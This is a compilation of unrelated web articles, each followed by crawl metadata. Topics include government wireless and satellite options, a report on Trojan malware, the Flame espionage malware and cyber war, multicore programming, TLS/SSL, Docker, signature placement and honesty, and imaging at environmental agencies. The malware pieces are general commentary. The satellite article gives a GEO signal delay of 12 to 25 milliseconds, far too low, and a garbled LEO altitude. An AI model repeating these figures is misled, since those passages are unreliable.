Personal communications systems (PCS) are the next generation of terrestrial-based commercial wireless communications, providing inexpensive voice and data services. PCS include a broad range of telecommunications services intended to provide subscribers with enhanced features and wireless access to the public switched network. "One person, one number" has become the familiar motto of PCS in recent years.
The Personal Communications Indu-stry Association predicts that there will be more than 167 million subscribers to PCS services by 2003. To accommodate this expected demand, the FCC has allocated both narrowband (901-902MHz, 930-931MHz, 940-941MHz) and broadband (1850-1990MHz) frequency spectra for PCS services. Blocks of spectra were auctioned by the FCC between 1995 and 1997.
PCS design is similar to cellular design, but PCS use all-digital technology. PCS systems use a large number of low-power transmission sites to support high levels of data throughput.
Examples of enhanced services available from PCS providers include voice mail; call hold, forwarding, waiting, and three-way calling; paging; text messaging; distinctive ringing; fraud control (through authentication and encryption); and better reception than analog cellular within the coverage area. Current data communication capability is provided via a dial-up connection, similar to switched-circuit cellular.
The jury is still out regarding the effectiveness of PCS for wide-area use. While existing PCS services rely on cellular-type architectures, combinations of PCS services with satellite and other technologies may provide a greater functionality in the future. However, since providers of PCS services have designed their systems using competing technologies, wide-area roaming may be difficult.
Some advantages and disadvantages of PCS are summarized below:
Personal Communications Systems (PCS)
* Telephone interconnect/easy access to Public Switched-Telephone Network (PSTN), or "regular" telephony
* Support for high-volume data applications
* Increased competition, lower prices
* Difficult to eavesdrop
* Advanced digital features
* Low-weight, multipurpose, low-cost devices
* System design allows for reduced power consumption, longer battery life
*Low power requiring numerous sites for coverage (limited initial coverage)
*Priority access not available for government users
*Competing technologies inhibit roaming
*Potentially high recurring costs
Satellites function as radio repeaters in the sky. Radio signals are beamed to the satellite from an earth station via an uplink. At the satellite, the signal is filtered, converted and retransmitted via a downlink to ground-station or mobile receivers. Satellites can receive and retransmit thousands of signals simultaneously, from simple digital data to the most complex television programming. Satellite systems provide effective and ubiquitous mobile communications for users requiring a large coverage area (e.g., transportation, military, exploration, and maintenance). Recently, satellite companies have begun to show a higher level of interest in the public-sector market.
Two main types of satellite systems offer communications services applicable to government users: geosynchronous earth orbit (GEO) and low earth orbit (LEO) satellites. Satellite system providers use both circuit-switched and packet-switched technologies.
GEOs orbit the earth at an altitude of approximately 22,300 miles, traveling at the same angular speed as the earth rotates on its own axis. Thus, GEOs appear to remain "stationary" relative to a reference point on the earth. A single GEO can "see" approximately 40 percent of the Earth's surface. Three such satellites, spaced at equal intervals, can provide global coverage.
Due to a GEO satellite's distance from Earth, reception of the repeated signal can be delayed as much as 12 to 25 milliseconds for each outbound and inbound transmission. Data throughput rates range from 4.8Kbps to 9.6Kbps. In addition, these large distances cause GEO transmissions to require more power than closer terrestrial or LEO communications. This requirement has made it difficult to produce convenient hand-held radios that are able to access GEO satellites. GEO service vendors have historically focused on video, data broadcasting and long-haul transportation industries.
LEO satellites do not remain stationary above the Earth. They orbit 300 to 300-900 miles above the Earth's surface at speeds of 16,500 miles per hour. A LEO system is made up of satellites all traveling at the same speed and the same altitude. Satellites are positioned relative to each other such that each covers a portion of the Earth's surface. When the satellites travel around the world, their coverage area moves with them. As one satellite starts to leave a certain geographic area, it "hands off" communications to the next satellite as it enters the area, maintaining continuous coverage. A network control system interconnects the LEO satellites and links individual satellites. Since LEOs are closer to the Earth's surface, less power is required to send a message to them. User devices can be smaller and less sophisticated than those designed for use with GEO systems.
Significant efforts are currently under way to develop new LEO systems, with the earliest service anticipated for later this year. LEO vendors include:
* Globalstar -- A joint effort between Loral and Qualcomm, offering narrowband, dual-mode telephones with paging, low-speed data and position-location services.
* ECCO -- Designed by Constellation Communications, ECCO will offer
narrowband, dual-mode telephones with paging, low-speed data and fax services.
* Iridium -- This LEO service provider is from Motorola. Iridium will offer
narrowband, dual-mode telephones with paging, low-speed data, and fax
*Teledesic -- Co-founded by Microsoft's Bill Gates and Craig McCaw of McCaw Communications. It will offer broadband multimedia, videoconferencing and Internet services.
The tables below summarize some of the advantages and disadvantages of geosynchronous and low earth orbit satellites:
Geosynchronous Earth Orbit (GEO) Satellites
*Access to PSTN
*Many advanced digital features
*Accessibility from remote areas
*Ability to support voice and data
*Reduced coverage in "urban canyons"/line-of-sight
*Limited range of user equipment
*Low data-transmission rates
*High user equipment costs
*High, recurring costs
*Significant propagation delay
*Single point of failure
*Unproven for public safety and local government use
Low Earth Orbit (LEO) Satellites
*Advanced digital features
*Little propagation delay
*Access to PSTN
*Ability to support voice and data
*Entire system must be in place before operable
*Requires enormous infrastructure
*Limited range of user equipment
*Unproven; features and capabilities unclear
*Potentially high recurring and equipment costs
Evaluating wireless technology can be complicated and time-consuming. However, focusing on users' functional needs can enable more effective comparison of alternatives. Some specific areas to consider for wireless technology include:
* Application Integration -- Does the technology allow a smooth interface with current and planned applications? Would it facilitate software modifications if changes in system protocol or operational requirements occur?
* Performance -- Software and hardware components of the network must be responsive to user needs. Sensitivity to loading requirements, peak user demand and the ability to transfer information in the time frame required are critical parameters.
* Availability/Reliability -- On an annual basis, what is the percentage of time that the network is available for processing user requests? How does the availability change during emergencies or other periods of peak usage?
* Security -- Careful consideration must be given to the ability of system managers to control access to and use of the network on a user-by-user basis
* User Interface/Device -- The types of devices available for use on the network, their functionality -- including features, indications, ergonomic capabilities,
vendor sources, etc. -- should be compared to end-user requirements.
* Coverage -- The percentage of the service area over which the network can be used, usually defined by geographic areas with associated reliabilities for accessing the system. How does the coverage area compare to user-defined operating areas?
Gregory Walker is a senior consultant with The Warner Group, a Woodland Hills, Calif.-based management consulting firm specializing in the public sector. He has significant experience evaluating wireless voice and data systems and can be reached at (818) 710-8855.
November Table of Contents | <urn:uuid:ac9fa957-3756-4b55-8cd2-51ad08cf6c56> | CC-MAIN-2017-09 | http://www.govtech.com/featured/Governments-Surfing-the-Wireless-Wave.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00354-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.899752 | 3,791 | 3.265625 | 3 |
Trojan horses gain inside track as top form of malware
Panda Security released its latest report on computer malware, showing unexpected trends government security managers should know about, including the resurgence of a traditional form of malware.
First, the number of new infections is staggering, though system administrators probably expect that these days. In the first three months of the year, there were over six and a half million new malware samples created. Many of those are probably minute variations of each other, but that’s still an astounding number.
But what is more interesting is that over 80 percent of the infections are Trojan Horses. Trojans can’t replicate on their own. Unlike worms or most viruses, they are incapable of copying their code to other computers once they find a home. So how did they capture the number one spot in infections? Simple. The people who program them set them up on compromised websites. Users download them, thinking they are something else, like a Java plug-in or a browser helper. They can even be targeted to specific users, such as those running a certain operating system with a known vulnerability, making them highly effective.
In fact, Panda calls them the most dangerous type of infection, because their job is to steal personal information, bank account information, government secrets or other data that leads to further crimes being committed. “Trojans are cyber-crooks’ weapon of choice, which explains why they account for most new specimens in circulation and infections triggered in the first quarter of the year,” wrote Luis Corrons, technical director of Panda Labs, as part of the new report.
Another interesting fact in the report is the number of infected computers by country. While the global average for infected computers is 31.13 percent, the United States remains below that number by just a bit with 27.79 percent of its computers infected. And while we often think of China as being an instigator of cyber crimes (a recent report from Prolexic showed it was the largest base of operations for DDOS attacks so far in 2013), the Chinese apparently have their own problems too.
According to the Panda report, over 50 percent of all the computers in China are infected with malware of some type, making it the only nation in the world with more than half of its systems compromised.
Obviously the new report is an eye opener in lot of ways. Computer crimes being committed through Trojans aren’t just designed to ruin work or to embarrass users by sending porn to all their contacts. They are launch pads for other crimes where criminals steal real money, passwords or even government secrets. The need to remain vigilant, have the latest virus and malware protection constantly updated and to simply be careful what you download is more important than ever. It’s a dangerous world out there, and the latest Panda report shows just how dark things have become.
Posted by John Breeden II on May 06, 2013 at 9:39 AM | <urn:uuid:f92b86af-be99-4592-a4f5-1343756c2fc0> | CC-MAIN-2017-09 | https://gcn.com/blogs/emerging-tech/2013/05/trojan-horses-top-malware.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00530-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964768 | 601 | 2.53125 | 3 |
3D Printing and the Future of Manufacturing
Who would have thought that modern manufacturing could be done without a factory? Since the Industrial Revolution, manufacturing has been synonymous with factories, machine tools, production lines and economies of scale. So it is startling to think about manufacturing without tooling, assembly lines or supply chains. However, that is what is emerging as the future of 3D printing services takes hold.
3D printing is making its mark as it reshapes product development and manufacturing and turns individuals, small businesses and corporate departments into “makers.” CSC’s new report, 3D Printing and the Future of Manufacturing, explores the opportunities of 3D printing services and provides 10 questions companies should be asking as they prepare to join this trend.
The idea of a do-it-yourself manufacturer is really coming to the forefront. Similar to the way the Internet leveled the playing the field, solving the challenges of reach and enabling everyone to play, that’s what is happening with manufacturing today.
You don’t need all of the capital involved in the creation of things anymore. You now have the opportunity at a small scale, even as a hobbyist, to do it yourself, and to do it fairly eloquently.
With 3D printing being applied to materials ranging from chocolate to cells to concrete, and being used by corporations, departments and consumers, organizations need to understand how the future of 3D printing manufacturing technology can be used for a for competitive advantage – before their competitors do.
3D Printing and Manufacturing for All
3D printing has been around for decades, better known as additive manufacturing (building an object layer by layer). What’s new is that 3D printing has reached consumer-friendly price points and footprints, new materials and techniques are making new things possible, and the Internet is tying it all together.
Technology has developed to the point where we are rethinking industry. The next industrial revolution is opening up manufacturing to the whole world – where everyone can participate in the process. This democratization idea will not be much different than the journey computers had – from a few, big, centralized mainframes to something we now hold in our hands.
Desktop 3D printing manufacturing technology can be done at home, the office, a hospital or a school, bringing manufacturing to non-manufacturers the way PCs brought computing to non-traditional environments.
At the same time, 3D printing, long used for rapid prototyping, is being applied in a number of industries today, including aerospace and defense, automotive and healthcare. As accuracy has improved and the size of printed objects has increased, 3D printing services are being used to create such things as topographical models, lighter airplane parts, aerodynamic car bodies and custom prosthetic devices. In the future, it may be possible for the military to print replacement parts right on the battlefield instead of having to rely on limited spares and supply chains.
However, it’s not just about replacing the technique of how we make and get a product – it’s about creating brand new products, with entirely new properties, that were not possible with the old techniques.
Further, any time there are new products and new properties, that changes the way business operates. If you apply every stage in the supply chain to this new world of 3D printing, the processes are going to change across the board.
Learn more about the origin of 3D printing and its impact on manufacturing by downloading the full 3D Printing and the Future of Manufacturing (PDF) report. | <urn:uuid:c0555ee4-0776-45a5-b5b0-c7e05f4a0ff3> | CC-MAIN-2017-09 | http://www.csc.com/innovation/insights/92142-the_future_of_3d_printing_services_and_manufacturing?ref=rec&dyn=0 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00578-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954632 | 724 | 2.890625 | 3 |
What Does Flame Mean?
Once a system is infected, Flame begins a complex set of operations, including sniffing the network traffic, taking screenshots, recording audio conversations, intercepting the keyboard, and so on. All this data is available to the operators through the link to Flame’s command-and-control servers.
Lots of people are asking “What does Flame do?” The more important question, however, as the era of cyber war continues to evolve, is “What does Flame mean?” Flame, in fact, shows just how far and fast we’ve come along in cyber war. In the “old days” we saw the simple use of DDoS when Russia attacked Estonia in April of 2007. Just five years later, Flame shows the world that cyber war has evolved into something stealthier, more effective and a serious part of a military strategy. To borrow Andy Grove’s phrase, we’ve hit an inflection point. Consider:
- Cyber attack is now preferable to a military attack. The consequences of NOT using cyber warfare now outweigh cyber pacifism. It’s a bloodless form of war which can still inflict great damage. (What amazing irony that the same day Flame is revealed, the New York Times highlights the US approach to terrorism that involves a targeted “kill list.”) In fact, in the case of Iran, it seems cyber attack may have proven more effective than economic sanctions that seem to have done little to stop the development of nuclear weapons. For the attacker, anonymity is a major benefit as the victim can only speculate but can’t point a finger. Graphic images of source code just aren’t the same as pictures of dead or injured civilians when it comes to altering public opinions. If there were a physical attack on Iran, Iranian public opinion would very likely be mobilized behind a normally unpopular government.
- Cyber attack is a new form of deterrence. During the Cold War, if the US had 1,000 warheads the Soviets would try to get 1,001 which would lead to a Strategic Defense Initiative, a.k.a., Star Wars. Cyber attack gives deterrence a totally new spin: for the first time, a nation can prevent someone from garnering weapons. And this approach, conveniently, appears morally superior and so far has proven much less costly.
- Cyber attack will force adversaries to minimize their electronic productivity. It took nearly a decade to find Osama Bin Laden since he went completely off grid. No internet or phone, just couriers. Consequently, he became more of a titular versus operational leader. Does this mean that scientists developing weapons will resort to crayons and paper only? Probably not, but today life very likely got a lot harder for scientists working on military projects worldwide.
Authors & Topics: | <urn:uuid:d0236aa9-8970-4787-a233-1bf1a9888cf5> | CC-MAIN-2017-09 | http://blog.imperva.com/2012/05/what-does-flame-mean.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00102-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951682 | 578 | 2.984375 | 3 |
Cray J. Henry | The multicore challenge
Another View | Guest commentary: The makers of multicore processors in PCs could learn a few things from high-performance computing
- By Cray Henry
- Sep 20, 2007
Cray J. Henry
Before the beginning of this decade you could have spent millions of dollars in new computer hardware each year and never had to consider buying a multicore computer ' unless you were in the market for a high-end supercomputer. Today dual-core machines are common on many desktops, quad-core machines are moving to market now, and the Sony PS3 gaming console has nearly double that number of computational elements supporting the main processor.
During the next several years we'll see processors with ever-larger core counts on the market. Arguably they will be much more powerful. But it raises new questions beyond how best to harness all that computational power. In particular, how can software developers create applications that can use all the cores efficiently to solve your problem faster?
This transition is already in motion and, without a disruptive new processing technology, inevitable. The reason for the move is straightforward ' people buying computers today want machines that are better than what they bought yesterday. But as technology advanced the chipmakers had to change how they define 'better.'
In the final decades of the 20th century the standard metric was the clock speed of a processor. Processors moved inexorably from 10 MHz up through 1 GHz. But as processor clock cycles moved into the GHz range, chip manufacturers encountered two main problems. First, the processors became so much faster than the rest of the computer that the processors had to (and still have to) wait for the information they need to continue working from slower memory systems. Radical changes in processor architecture were able to hide some of this delay, but carried higher design costs and added complexity for the software designers.
The second major problem chip designers encountered in moving past the 1 GHz mark is that faster clock speeds cause disproportionately higher power consumption and heat generation, causing problems for consumers and data centers hosting these machines.The return of the FLOPS
Faced with a departure from the standard technology improvement cycle, manufacturers started to blend the ideas of capability and speed, resurrecting an older capability measure called FLOPS (Floating Point Operations Per Second). The advantage of FLOPS is that it can describe 'improving' computer performance while clock speeds stagnate or even decline. As manufacturers are able to create smaller and smaller features, space is made available on processor chips that can be used to host additional cores that can do more floating-point operations in a single clock cycle, and today's computers can once again be marketed as 'better' than yesterday's.
The problem, of course, is the software. How can software developers create applications that can use all of the cores efficiently on behalf of the user?
When the clock speeds were going up, the same old programs ran faster, usually with no effort on the part of the software developer. But as cores are added to processors at the same clock speed, software has to be adjusted to take advantage of the new capability. The challenge of writing parallel software has been the key issue for the computational science and supercomputing community for the last 20 years. There is no easy answer; creating parallel software applications is difficult and time consuming.The convergence of supercomputing and commodity computing
In the supercomputing community we have many applications that can effectively use dozens to thousands of cores, but these applications represent only a tiny fraction of the applications in use around the world today. The real value of multicore machines will not be realized until mainstream software development techniques and practices evolve to encompass the art of parallel programming. The emergence of multicore computers brings this challenge to the forefront.
This is an area in which high-performance supercomputing has an advantage of several decades over the mainstream computing community.
The main challenge in parallelization is dividing a task over all the cores such that they are all working collectively at the same time on your problem. Most applications in use today follow very sequential logical approaches designed to run on one core; multicore developers have to be trained to think of parallel approaches. They are now faced with issues such as how to keep data synchronized as results are computed, shared and used as input to follow-on calculations across tens to thousands of cores. With each core potentially running independently, this is a hard problem especially if you don't want to waste compute cycles on individual cores waiting for the slowest calculation to catch up.
In HPC, there are two main trends supporting the development of parallel software ' the use of special language extensions that support explicit control of communications among individual compute cores (e.g. Message Passing Interface and Open MP) and the specialized parallel languages (e.g. Co-array Fortran and Parallel Unified C) that support both explicit communications and parallel logic constructs.
MPI has become the dominant approach in high-performance technical computing (HPTC) primarily because it is portable across multiple platforms and has a long legacy of support by the vendors. Developers of scientific applications in HPC can expect that successful products will be in use for 20 to 40 years, so they value portability.
But it's not clear that MPI can continue to dominate even in scientific software. Creating an MPI application necessitates very low-level understanding of data and process coordination. This requires significant recoding efforts for existing applications, and the level of detail that has to be managed by the programmer can make getting a verifiably correct software application that scales to tens of thousands of processors (or cores) a very expensive and time-consuming process.
Parallel languages have picked up momentum over the last several years because they offer a path to faster and more straightforward software development but, while their portability is growing, they are not yet as portable or 'future proofed' as MPI.
As the computing community struggles with this latest transition, we're finally at a point where HPC and commodity computing have more than shared chips in common. The trick will be working together to take the best of what we know works on a large scale, avoid trying the techniques we already know don't work, and get a solution faster that benefits us all.Cray J. Henry is director of the Defense Department's High Performance Computing Modernization Program, E-mail him at firstname.lastname@example.org. An abridged version of his comments appeared in the Sept. 24, 2007, issue of GCN. | <urn:uuid:64f6f7e6-a4d3-436e-93ca-f3caee7bce6e> | CC-MAIN-2017-09 | https://gcn.com/articles/2007/09/20/cray-j-henry--the-multicore-challenge.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00102-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950652 | 1,333 | 2.890625 | 3 |
Transport Layer Security or TLS, widely known also as Secure Sockets Layer or SSL, is the most popular application of public key cryptography in the world. It is most famous for securing web browser sessions, but it has widespread application to other tasks.
TLS/SSL can be used to provide strong authentication of both parties in a communication session, strong encryption of data in transit between them, and verification of the integrity of that data in transit.
TLS/SSL can be used to secure a broad range of critical business functions such as web browsing, server-to-server communications, e-mail client-to-server communications, software updating, database access, virtual private networking and others.
However, when used improperly, TLS can give the illusion of security where the communications have been compromised. It is important to keep certificates up to date and check rigorously
for error conditions.
In many, but not all applications of TLS, the integrity of the process is enhanced by using a certificate issued by an outside trusted certificate authority.
This paper will explore how TLS works, best practices for its use, and the various applications in which it can secure business computing. | <urn:uuid:9fe758f4-4ae8-49bb-88c6-3d8710f57d91> | CC-MAIN-2017-09 | https://www.infosecurity-magazine.com/white-papers/best-practices-and-applications-of-tlsssl/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00454-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93628 | 237 | 3.421875 | 3 |
Docker started out as a means of creating single application containers, but since has grown into a widely used dev tool and runtime environment. It has been downloaded around two billion times, and Redmonk has said that “we have never seen a technology become ubiquitous so quickly.” The Docker registry stores container images and provides a central point of access which can be used to share containers. Users can either place images into the registry or obtain images from it to deploy directly from the registry. Despite its widespread growth and acceptance, Docker still retains its free open source roots, and hosts a free public registry for containers from which anyone can obtain official Docker images. Below is an infographic discovered via Twistlock which a really nice overview of Container technologies.
By Jonquil McDaniel | <urn:uuid:4d0afe8c-bf11-45e7-bf9f-22e6062388ee> | CC-MAIN-2017-09 | https://cloudtweaks.com/2016/09/history-containers-rise-docker/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00223-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.965203 | 156 | 2.59375 | 3 |
What's the purpose of signing a form? On the simplest level, a signature is simply a way to make someone legally responsible for the content of the form. But in addition to the legal aspect, the signature is an appeal to personal integrity, forcing people to consider whether they're comfortable attaching their identity to something that may not be completely true.
Based on some figures in a new PNAS paper, the signatures on most forms are miserable failures, at least from the latter perspective. The IRS estimates that it misses out on about $175 billion because people misrepresent their income or deductions. And the insurance industry calculates that it loses about $80 billion annually due to fraudulent claims. But the same paper suggests a fix that is as simple as tweaking the form. Forcing people to sign before they complete the form greatly increases their honesty.
It shouldn't be a surprise that signing at the end of a form does not promote accurate reporting, given what we know about human psychology. "Immediately after lying," the paper's authors write, "individuals quickly engage in various mental justifications, reinterpretations, and other 'tricks' such as suppressing thoughts about their moral standards that allow them to maintain a positive self-image despite having lied." By the time they get to the actual request for a signature, they've already made their peace with lying: "When signing comes after reporting, the morality train has already left the station."
The problem isn't with the signature itself. Lots of studies have shown that focusing the attention on one's self, which a signature does successfully, can cause people to behave more ethically. The problem comes from its placement after the lying has already happened. So, the authors posited a quick fix: stick the signature at the start. Their hypothesis was that "signing one’s name before reporting information (rather than at the end) makes morality accessible right before it is most needed, which will consequently promote honest reporting."
To test this proposal, they designed a series of forms that required self reporting of personal information, either involving performance on a math quiz where higher scores meant higher rewards, or the reimbursable travel expenses involved in getting to the study's location. The only difference among the forms? Some did not ask for a signature, some put the signature on top, and some placed it in its traditional location, at the end.
In the case of the math quiz, the researchers actually tracked how well the participants had performed. With the signature at the end, a full 79 percent of the participants cheated. Somewhat fewer cheated when no signature was required, though the difference was not statistically significant. But when the signature was required on top, only 37 percent cheated—less than half the rate seen in the signature-at-bottom group. A similar pattern was seen when the authors analyzed the extent of the cheating involved.
Although they didn't have complete information on travel expenses, the same pattern prevailed: people who were given the signature-on-top form reported fewer expenses than either of the other two groups.
The authors then repeated this experiment, but added a word completion task, where participants were given a series of blanks, some filled in with letters, and asked to complete the word. These completion tasks were set up so that they could be answered with neutral words or with those associated with personal ethics, like "virtue." They got the same results as in the earlier tests of cheating, and the word completion task showed that the people who had signed on top were more likely to fill in the blanks to form ethics-focused words. This supported the contention that the early signature put people in an ethical state of mind prior to completion of the form.
But the really impressive part of the study came from its real-world demonstration of this effect. The authors got an unnamed auto insurance company to send out two versions of its annual renewal forms to over 13,000 policy holders, identical except for the location of the signature. One part of this form included a request for odometer readings, which the insurance companies use to calculate typical miles travelled, which are proportional to accident risk. These are used to calculate insurance cost—the more you drive, the more expensive it is.
Those who signed at the top reported nearly 2,500 miles more than the ones who signed at the end.
Although the authors don't say so explicitly, they suggest we'd be pretty stupid not to adopt this simple, inexpensive fix. Calling it a "gentle nudge," they note that putting signatures on top "does not impose on the freedom of individuals, it does not require the passage of new legislation, and it can profoundly influence behaviors of ethical and economic significance." The only caution they add is that we might eventually adapt to the difference, and its effect will lessen—or, as they put it, "individuals may find new 'tricks to disengage from morality." | <urn:uuid:33b504bb-c84f-4c3f-9dbf-bf7d467f9f4a> | CC-MAIN-2017-09 | https://arstechnica.com/science/2012/08/youre-less-likely-to-lie-if-you-sign-your-name-before-filling-out-forms/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00399-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.968737 | 996 | 3.046875 | 3 |
The Internet and the Domain Name System (DNS) are continually changing; domains are constantly created and existing ones are frequently modified. Cybercriminals change DNS records to hijack domains and redirect traffic to malicious websites.
The redirected traffic bypasses their hosts leaving organizations unaware that traffic is being diverted. This leaves businesses and customers at great risk.
“Farsight’s DNS Changes is the authoritative source of changes in Internet infrastructure.”
Whenever a new domain is created or a domain’s configuration changes, the DNS Changes channel highlights that change in real-time. This lets organizations easily monitor their DNS worldwide and alert on unauthorized changes due to operational accidents — or an attack.
The data is collected from the Farsight global DNS sensor array. The DNS Changes channel contains more than 200,000 observations per second to provide a holistic view of all DNS changes including:
A resource record (RR) is a single DNS record.
A resource record set (RRset) consists of all the resource records of a given type for a given rrname.
When the DNS Changes channel detects a never-before-seen RRset, it publishes that RRset to Channel 214 on SIE. It also annotates novel information about each RRset. These include individual RRs that have not been seen before and whether the RRset has changed from those previously seen for a Fully Qualified Domain Name (FQDN).
Data is presented as a time-stamped RRset, providing full context for observed changes as well as critical information for security investigators and operational change management.
It reports on global changes when existing domains purposely, inadvertently or maliciously: | <urn:uuid:7af60c17-afda-4e77-aa45-3947fe8aa5eb> | CC-MAIN-2017-09 | https://www.farsightsecurity.com/solutions/threat-intelligence-team/dns-changes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00575-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.919951 | 341 | 2.703125 | 3 |
For many organizations, web sites serve as mission critical systems that must operate smoothly to process millions of dollars in daily online transactions. However, the actual value of a web site needs to be appraised on a case-by-case basis for each organization. Tangible and intangible value of anything is difficult to measure in monetary figures alone.
Web security vulnerabilities continually impact the risk of a web site. When any web security vulnerability is identified, performing the attack requires using at least one of several application attack techniques. These techniques are commonly referred to as the class of attack (the way a security vulnerability is taken advantage of). Many of these types of attack have recognizable names such as Buffer Overflows, SQL Injection, and Cross-site Scripting. As a baseline, the class of attack is the method the Web Security Threat Classification will use to explain and organize the threats to a web site.
The Web Security Threat Classification will compile and distill the known unique classes of attack, which have presented a threat to web sites in the past. Each class of attack will be given a standard name and explained with thorough documentation discussing the key points. Each class will also be organized in a flexible structure. The formation of a Web Security Threat Classification will be of exceptional value to application developers, security professionals, software vendors or anyone else with an interest in web security. Independent security review methodologies, secure development guidelines, and product/service capability requirements will all benefit from the effort.
Download the paper in PDF format here. | <urn:uuid:254199e5-ed7c-4c14-9d3f-e27f4c0c373b> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2004/07/28/web-security-threat-classification/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00099-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.91939 | 304 | 2.6875 | 3 |
State agencies that help protect our land, water and air and manage our natural resources have -- well -- an environmental problem.
The regulations they enforce to reduce pollution and to ensure the wise use of trees, minerals, water and land are generating huge amounts of paper. Businesses must send in forms and documents to show they are abiding by the latest state and federal environmental regulations. Departments of environmental protection and natural resources have to churn out copies of the same documents for lawyers, federal bureaucrats and the public. It adds up to a lot of consumed trees, not to mention the side effects of pollution from pulp production and land development for offices and warehouses to store the paper.
At the same time, paper generated by the permits and regulations consumes scarce government resources to cover the filing, distribution and analysis of the documents. For example, Iowa's Air Quality Bureau processes permits that allow the controlled emission of air pollution in the state. In 1996, the bureau will issue only 283 permits, but one application for a permit can run 7,000 pages.
The bureau received as many as 3 million pages of documents this year, all of which have to be carefully analyzed to ensure the state doesn't allow too much pollution into the air. "We were in a real bind because of all the paper," said Peter Hamlin, chief of the Air Quality Bureau. "We've had to rent warehouse space to help out with storage."
In Utah, where water is a precious natural resource, the story is the same. An individual or business just can't drill a well or tap into nearby surface water. They have to obtain the rights to use the water through a special process that's administered by the state's Division of Water Rights, in the Department of Natural Resources.
Since 1897, Utah has been tracking all state water rights and has on file 8 million pages of documents, all of which are open to public access. As environmental controls tighten and management of limited resources becomes more complex, the amount of regulation in this field can only grow.
To avoid a regulatory collapse brought on by too much paper, state agencies are turning to imaging technology to alleviate the burden of storing, retrieving, distributing and processing documents. Advances in client/server technology, object-oriented software, document management, workflow, relational databases, high-speed scanners, CD-ROM storage and the Internet make the job of protecting and regulating the environment more manageable.
In a report produced by Vermont's Agency of Natural Resources, potential imaging applications include state land records, permit applications, publications, hazardous site manifests, well logs, engineering drawings and permit application site plans, hunting and fishing licenses, staff training and public education.
Despite the numerous possibilities, imaging is a relative newcomer to the field of environmental protection and natural resources. While the number of installations is growing, the imaging applications now in operation are few and their scale is often quite large. Take, for example, Florida's Department of Environmental Protection, which has installed a $7.5 million document imaging system to process documents for the statewide cleanup of underground storage tanks that are contaminating groundwater.
The project involved the complete reengineering of the department in charge of waste cleanup, and a massive backfile conversion of paper documents &endash; of which the state has more than 7 million relating to underground storage tanks alone. The system was built by Digital Equipment Corp., using high-speed Alpha servers, an Oracle database management system and Highland Technologies' Highview imaging and workflow software.
According to John Willmott, bureau chief of the department's information services, the imaging system will significantly advance the department's ability to process the authorization and reimbursement for storage tank removal. "That, in turn, speeds up the protection of Florida's environment," he said.
Florida's removal and cleanup of underground tanks is a state problem, funded by state legislation. In Iowa, issuing permits that allow the controlled emission of air pollutants is a federal mandate, conducted under the 1990 Clean Air Act. Fortunately, the act stipulates that large polluters have to pay states a fee based on the amount of air pollution released. From that fee the state can fund the use of technology, such as imaging, to manage the information gathered on polluters.
When the Air Quality Bureau made plans to use the funds for imaging, the industries that paid the fees demanded a cost-benefit analysis first, to ensure the project wouldn't end up as an expensive boondoggle. "The results showed that the system would pay for itself in less than two years by cutting our labor costs," remarked Hamlin.
The bureau installed a $1.5 million imaging system in November, built by Wang and Radian International, a technology firm specializing in environmental projects. The 175-user system consists of Wang's imaging and workflow software, Hewlett-Packard servers, a Cygnet jukebox, an Oracle database, PCs running Microsoft Windows and UNIX workstations.
Not only does the imaging system automate the distribution of the permit documents to the bureau's staff, but it also adds value by running some basic calculations based on data that is read by the system's optical character reading software. "It will calculate the potential emissions generated by an applicant based on the data they submit," said Hamlin. "It's going to save our permit reviewers a tremendous amount of time."
In Pennsylvania, imaging is helping the state track the "who, what, when and where" concerning hazardous municipal and industrial waste. The state's Bureau of Land Recycling and Waste Management has installed a $1.2 million document management system that uses imaging to convert documents on hazardous waste manifests and related fee collections -- worth $35 million annually -- into a database of information for environmental analysts.
The system, which serves 24 users, can also process incoming faxes, electronic data interchange files, mainframe reports and e-mail messages. The software, an object-based electronic document management product suite, was developed by Vantage Technologies, a firm recently purchased by Wang.
According to Bureau Chief Jeff Beatty, the system's biggest benefit is the way it speeds up the flow of information. "That time savings allows us to collect fees much faster than in the past," he said. It has also allowed analysts to spend more time analyzing information and less time searching for it. "It's liberated our analysts in terms of time. That's a positive experience for us."
Public access is another service that environmental and natural resource departments must provide. By linking imaging systems with the Internet, states can extend access far beyond what was ever thought possible. Utah's Division of Water Rights has begun putting documents on the World Wide Web at: .
Iowa's Air Quality Bureau plans to do the same. Though, as Hamlin remarked dryly, "I can't imagine a lot of people will want to read this stuff. Some of it's pretty boring." | <urn:uuid:ba1f4382-5757-424c-9fd9-5e396a7063f1> | CC-MAIN-2017-09 | http://www.govtech.com/magazines/gt/Imaging-Takes-on-the-Environment.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00095-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945205 | 1,396 | 2.71875 | 3 |
Article by Coleen Torres
